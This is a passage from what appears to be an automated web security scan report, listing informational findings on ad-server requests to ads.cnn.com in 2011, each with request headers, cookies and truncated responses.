P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:47:10 GMT
Pragma: no-cache
Content-Length: 137
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<body style="margin: 0px;">
<!--FlightID: 4621-->

</body>
</html>

18.24. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:28 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:28 GMT
Pragma: no-cache
Content-Length: 3237
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.25. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=726845  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=726845

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=726845 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:17 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:17 GMT
Pragma: no-cache
Content-Length: 3640
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.26. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=773777  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=773777

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=773777 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:31 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:31 GMT
Pragma: no-cache
Content-Length: 3128
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.27. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center¶ms.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=78541  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=78541

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=78541 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:13 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:13 GMT
Pragma: no-cache
Content-Length: 3420
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.28. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot¶ms.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=229469  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=229469

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=229469 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:51 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:51 GMT
Pragma: no-cache
Content-Length: 863
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=2244,2743,3285,6298,6520,8598,10240,17251,18961,19419,25128,25342,25344,25412,32749,32922,33852,34172,345
...[SNIP]...

18.29. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot¶ms.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=229469  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=229469

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=229469 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:46 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:46 GMT
Pragma: no-cache
Content-Length: 869
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=2244,2743,3285,6298,6520,8598,10240,17251,18961,19419,25128,25342,25344,25412,32749,32922,33852,34172,345
...[SNIP]...

18.30. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot¶ms.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=229469  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=229469

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=229469 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:23 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:23 GMT
Pragma: no-cache
Content-Length: 868
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=2244,2743,3285,6298,6520,8598,10240,17251,18961,19419,25128,25342,25344,25412,32749,32922,33852,34172,345
...[SNIP]...

18.31. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news¶ms.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=84066  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=84066

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=84066 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/?iid=EL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=CAC; WSOD%5FcompareToCategory=0; WSOD%5FcompareToSP500=0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:21 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:49:21 GMT
Pragma: no-cache
Content-Length: 2961
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.32. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks¶ms.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:46 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:46 GMT
Pragma: no-cache
Content-Length: 2583
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.33. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=technology¶ms.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=411857  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=technology&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=411857

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=technology&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=411857 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:50 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:50 GMT
Pragma: no-cache
Content-Length: 2938
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.34. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&domId=566446&page.allowcompete=yes&domId=566446  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&domId=566446&page.allowcompete=yes&domId=566446

Request

GET /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&domId=566446&page.allowcompete=yes&domId=566446 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:29 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:29 GMT
Pragma: no-cache
Content-Length: 2754
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...

18.35. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072

Request

GET /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
